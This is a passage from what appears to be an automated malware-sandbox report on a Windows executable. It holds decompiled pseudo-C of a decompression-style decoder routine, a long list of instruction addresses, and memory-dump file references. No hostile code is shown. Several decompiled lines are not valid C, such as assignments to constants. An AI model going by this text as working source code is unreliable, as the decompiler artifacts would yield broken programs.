											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00407194
0x00407194
0x00407194
0x00407194
0x0040719a
0x0040719e
0x004071a2
0x004071ac
0x004071ba
0x00407490
0x00407490
0x00407493
0x0040749a
0x004074c7
0x004074c7
0x004074cb
0x00000000
0x00000000
0x004074cd
0x004074d6
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074ee
0x00407507
0x0040750a
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074ff
0x00407502
0x00407502
0x00407524
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074cb
0x00000000
0x00000000
0x00000000
0x00407526
0x00407526
0x0040749f
0x004074a3
0x004075db
0x004075db
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x004075fd
0x00407601
0x00407601
0x004074a9
0x004074af
0x004074b6
0x004074be
0x004074be
0x004074c1
0x00000000
0x004074c1
0x0040752b
0x00407538
0x0040753b
0x00407447
0x00407447
0x00407447
0x00406be3
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00406bf2
0x00000000
0x00406bf9
0x00406bfd
0x00000000
0x00000000
0x00406c03
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c5e
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x0040754e
0x00000000
0x0040754e
0x00406ca8
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd2
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x0040755d
0x00000000
0x0040755d
0x00406d18
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040741c
0x00407420
0x004075cf
0x004075cf
0x00000000
0x004075cf
0x00407426
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00407441
0x00407441
0x00407447
0x00407447
0x00000000
0x00000000
0x00406d5f
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00406ffe
0x00407002
0x00407020
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x004070ab
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x0040711c
0x00407120
0x00407127
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00407122
0x00000000
0x00000000
0x00407143
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00000000
0x00000000
0x00407395
0x00407395
0x00407399
0x004073bb
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x0040739b
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00407490
0x00407493
0x0040749a
0x00000000
0x0040749d
0x00407458
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407543
0x00407546
0x00407447
0x00407447
0x00407447
0x00000000
0x0040744d
0x00000000
0x0040717d
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x0040749d
0x00000000
0x00000000
0x00000000
0x004071c2
0x004071c2
0x004071c5
0x004071fb
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x004075bd
0x00000000
0x004075bd
0x00407339
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725b
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004074c7
0x00407490

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
